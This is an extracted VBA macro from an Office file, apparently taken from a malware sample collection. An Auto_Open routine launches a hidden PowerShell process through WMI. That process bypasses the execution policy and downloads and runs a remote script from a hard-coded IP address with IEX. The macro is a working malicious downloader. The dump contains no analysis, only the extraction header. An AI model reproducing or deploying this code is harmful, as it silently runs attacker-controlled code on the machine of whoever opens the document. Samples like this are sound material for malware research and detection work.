Filename     : ./macros/f65f5f44aeeea6fdaa740385c81e600cc75d231d80fce715cb80cebe5c214410
OLE stream   : VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"
Sub Auto_Open()

Execute

End Sub


     Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
         
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://96.90.174.97:8088/DecryptContent.ps1'))"
     End Function

     

